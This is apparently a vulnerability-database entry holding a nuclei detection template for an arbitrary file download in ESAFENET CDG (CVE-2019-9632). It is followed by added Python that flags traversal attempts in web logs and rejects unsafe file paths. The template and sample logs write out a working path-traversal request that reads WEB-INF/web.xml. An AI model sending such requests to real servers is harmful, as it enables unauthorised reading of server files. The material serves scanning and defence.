ESAFENET CDG - Arbitrary File Download

Reported by ProjectDiscovery, 28 Jun 2026 03:02:45. Type: nuclei. Source: github.com. 86 views.

ESAFENET CDG - Arbitrary File Download vulnerability via the fileName parameter in download.jsp

Related

Reporter    Title               Published
CVE         CVE-2019-9632       8 Mar 2019 06:00
Cvelist     CVE-2019-9632       8 Mar 2019 06:00
NVD         CVE-2019-9632       8 Mar 2019 07:29
OSV         CVE-2019-9632       8 Mar 2019 07:29
Prion       Design/Logic Flaw   8 Mar 2019 07:29
RedhatCVE   CVE-2019-9632       22 May 2025 08:22
id: CVE-2019-9632

info:
  name: ESAFENET CDG - Arbitrary File Download
  author: pdteam
  severity: high
  description: |
    ESAFENET CDG V3 and V5 has an arbitrary file download vulnerability via the fileName parameter in download.jsp because the InstallationPack parameter is mishandled in a /CDGServer3/ClientAjax request.
  impact: |
    Attackers can download arbitrary files from the server, potentially leading to information disclosure or further exploitation.
  remediation: |
    Apply the latest security patches or update to the latest version provided by ESAFENET.
  reference:
    - https://github.com/HimmelAward/Goby_POC
    - https://github.com/Z0fhack/Goby_POC
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-9632
    epss-score: 0.39885
    epss-percentile: 0.98444
    cpe: cpe:2.3:a:esafenet:electronic_document_security_management_system:v3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: esafenet
    product: "electronic_document_security_management_system"
    fofa-query: "title=\"电子文档安全管理系统\""
  tags: cve,cve2019,esafenet,lfi,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/CDGServer3/ClientAjax"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: |
      command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<servlet-name>CDGPermissions</servlet-name>"
# digest: 4b0a00483046022100a622331f17878db84c60efe45767469514891da88d29e85a6b7737bcee6a4884022100ef74f2b197d9660c0b155ecc1d67cfc370ce8a120bebfeb28b7ddffc3a7c0584:922c64590222798bb761d5b6d8e72950
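The template above probes a single endpoint with a traversal value in the InstallationPack parameter and matches on a known string from web.xml. For a defender the two useful complements are (1) finding such requests in existing web logs and (2) the server-side check whose absence the description calls "mishandled". The following is an added example, not code from the template, from ProjectDiscovery or from ESAFENET; the log lines are constructed, the log format (combined log with the POST body appended as a quoted field) and the base directory /opt/cdg/packs are assumptions, and no detail of the real CDG code base is claimed.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote

# Constructed sample log lines (not from the page). The trailing quoted field is
# the request body, appended here only so the example can inspect POST parameters.
SAMPLE_LOG = """\
203.0.113.10 - - [28/Jun/2026:03:02:45 +0000] "POST /CDGServer3/ClientAjax HTTP/1.1" 200 4125 "command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp"
203.0.113.11 - - [28/Jun/2026:03:03:01 +0000] "POST /CDGServer3/ClientAjax HTTP/1.1" 200 8192 "command=downclientpak&InstallationPack=client_setup.exe&forward=index.jsp"
203.0.113.12 - - [28/Jun/2026:03:03:30 +0000] "POST /CDGServer3/ClientAjax HTTP/1.1" 200 4125 "command=downclientpak&InstallationPack=..%2f..%2fWEB-INF%2fweb.xml&forward=index.jsp"
203.0.113.13 - - [28/Jun/2026:03:04:00 +0000] "GET /CDGServer3/index.jsp HTTP/1.1" 200 512 "-"
"""

# Assumed log layout: ip ident user [timestamp] "METHOD PATH PROTO" status bytes "body"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<body>[^"]*)"$'
)

VULNERABLE_PATH = "/CDGServer3/ClientAjax"   # endpoint named in the template
WATCHED_PARAM = "InstallationPack"           # parameter the description says is mishandled


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding, stopping once the value is stable."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(value: str) -> bool:
    """True if the decoded value has a '..' segment, is an absolute path, or carries a NUL byte."""
    decoded = fully_decode(value).replace("\\", "/")
    if "\x00" in decoded or decoded.startswith("/"):
        return True
    return any(seg == ".." for seg in decoded.split("/"))


def find_traversal_attempts(log_text: str):
    """Return (ip, timestamp, status, value) for ClientAjax requests whose
    InstallationPack parameter looks like path traversal."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("path").split("?")[0] != VULNERABLE_PATH:
            continue
        params = parse_qs(m.group("body"))   # decodes one percent-encoding layer
        for value in params.get(WATCHED_PARAM, []):
            if is_traversal(value):
                hits.append((m.group("ip"), m.group("ts"), m.group("status"), value))
    return hits


def safe_resolve(base_dir: str, requested: str):
    """Hardened handling of a user-supplied file name: return the resolved path only
    if it stays inside base_dir, otherwise None. Containment is checked on the
    normalized result, so '..' segments and absolute paths are rejected alike."""
    base = posixpath.normpath(base_dir)
    if "\x00" in requested:
        return None
    candidate = posixpath.normpath(posixpath.join(base, requested.replace("\\", "/")))
    if candidate == base or not candidate.startswith(base + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for ip, ts, status, value in find_traversal_attempts(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} {WATCHED_PARAM}={value!r}")
```

A status of 200 on a flagged request is what distinguishes a successful download from a blocked attempt, so the status is kept in each hit; the matcher in the template relies on the same signal. The containment check in safe_resolve deliberately compares the normalized path against the base directory plus a trailing slash, so a sibling directory with the same prefix (for example /opt/cdg/packs2) is not accepted either.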
